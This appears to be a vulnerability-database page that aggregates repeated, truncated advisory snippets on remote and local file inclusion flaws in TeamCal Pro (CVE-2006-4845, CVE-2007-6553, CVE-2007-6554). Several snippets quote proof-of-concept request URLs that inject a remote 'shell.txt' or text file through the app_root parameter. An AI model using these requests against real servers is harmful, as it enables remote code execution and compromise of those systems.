EUVD-2007-6520

Malware in sbrugna...

TeamCal Pro <= 2.8.001 (app_root) Remote file Include Vulnerability

No description provided by source. Author:PSYCH@ [email protected] TeamCal Pro 2.8.001 approot Remote file inclusion Vulnerabilities Demo: www.lewe.com/tcpro/ Code: include $tcconfig'approot'.includes/footer.html.inc.php ; Exploit...

Local File Inclusion Vulnerability in TeamCal Pro

High-Tech Bridge SA Security Research Lab has discovered vulnerabilities in TeamCal Pro which could be exploited to compromise vulnerable system. 1 Local file inclusion vulnerability in TeamCal Pro The vulnerability exists due to input sanitation error in the "lang" parameter in index.php. A remo...

Directory traversal

Multiple directory traversal vulnerabilities in TeamCal Pro 3.1.000 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in the lang parameter to 1 index.php, 2 register.php, 3 login.php, or 4 statistics.php...

CVE-2007-6553

Multiple PHP remote file inclusion vulnerabilities in TeamCal Pro 3.1.000 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFapproot parameter to 1 tcuser.class.php, 2 absencecount.inc.php, 3 avatar.inc.php, 4 csvhandler.class.php, 5 functions.tcpro.php, 6...

CVE-2007-6554

Multiple directory traversal vulnerabilities in TeamCal Pro 3.1.000 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in the lang parameter to 1 index.php, 2 register.php, 3 login.php, or 4 statistics.php...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in TeamCal Pro 3.1.000 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFapproot parameter to 1 tcuser.class.php, 2 absencecount.inc.php, 3 avatar.inc.php, 4 csvhandler.class.php, 5 functions.tcpro.php, 6...

teamcal-rfilfi.txt

TeamCal Pro = 3.1.000 Multiple RFI / LFI Vulnerabilities Script: http://www.lewe.com/index.php?option=comdocman&task=catview&gid=112&Itemid=27 POC : http://localhost/ScriptPage/includes/tcuser.class.php?CONFapproot=http://localhost/020.txt?...

CVE-2007-6553

Multiple PHP remote file inclusion vulnerabilities in TeamCal Pro 3.1.000 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONFapproot parameter to 1 tcuser.class.php, 2 absencecount.inc.php, 3 avatar.inc.php, 4 csvhandler.class.php, 5 functions.tcpro.php, 6...

CVE-2007-6554

CVE-2007-6554 affects TeamCal Pro 3.1.000 and earlier. A directory traversal flaw allows remote attackers to include and execute arbitrary local files by supplying a .. (dot dot) in the lang parameter to index.php, register.php, login.php, or statistics.php. The vulnerability is rooted in imprope...

CVE-2007-6553

The CVE-2007-6553 entries describe multiple PHP remote file inclusion vulnerabilities in TeamCal Pro (versions up to 3.1.000 and earlier) that allow remote attackers to execute arbitrary PHP code by supplying a URL in the CONF[app_root] parameter to various includes/modules (e.g., tcuser.class.ph...

CVE-2007-6554

Multiple directory traversal vulnerabilities in TeamCal Pro 3.1.000 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in the lang parameter to 1 index.php, 2 register.php, 3 login.php, or 4 statistics.php...

TeamCalPro 3.1.000 - Multiple LocalRemote File Inclusions

TeamCalPro 3.1.000 - Multiple LocalRemote File Inclusions TeamCal Pro = 3.1.000 Multiple RFI / LFI Vulnerabilities Script: http://www.lewe.com/index.php?option=comdocman&task=catview&gid=112&Itemid=27 POC : http://localhost/ScriptPage/includes/tcuser.class.php?CONFapproot=http://localhost/020.txt...

TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications ======================================================================= TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities ======================================================================= TeamCal Pro = 3.1.000...

CVE-2006-4845

CVE-2006-4845 describes a PHP remote file inclusion in TeamCal Pro &lt;=2.8.001 via a URL in tc_config[app_root] in includes/footer.html.inc.php, enabling arbitrary PHP code execution. Connected records also show a related family (CVE-2007-6553) for TeamCal Pro

CVE-2006-4845

PHP remote file inclusion vulnerability in includes/footer.html.inc.php in TeamCal Pro 2.8.001 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the tcconfigapproot parameter...

TeamCal Pro <= 2.8.001 (app_root) Remote file Include Vulnerability

Exploit for unknown platform in category web applications =================================================================== TeamCal Pro = 2.8.001 approot Remote file Include Vulnerability =================================================================== Author:email protected TeamCal Pro...

TeamCal Pro 2.8.001 - &#039;app_root&#039; Remote File Inclusion

Author:PSYCH@ [email protected] TeamCal Pro 2.8.001 approot Remote file inclusion Vulnerabilities Demo: www.lewe.com/tcpro/ Code: include $tcconfig'approot'."includes/footer.html.inc.php" ; Exploit http://site.com/path/includes/footer.html.inc.php?tcconfigapproot=shell.txt?...

TeamCal Pro 2.8.001 - app_root Remote File Inclusion

TeamCal Pro 2.8.001 - approot Remote File Inclusion Author:PSYCH@ [email protected] TeamCal Pro 2.8.001 approot Remote file inclusion Vulnerabilities Demo: www.lewe.com/tcpro/ Code: include $tcconfig'approot'."includes/footer.html.inc.php" ; Exploit...

TeamCal Pro &lt;= 2.8.001 (app_root) Remote file Include Vulnerability

No description provided by source. Author:PSYCH@ [email protected] TeamCal Pro 2.8.001 approot Remote file inclusion Vulnerabilities Demo: www.lewe.com/tcpro/ Code: include $tcconfig'approot'."includes/footer.html.inc.php" ; Exploit...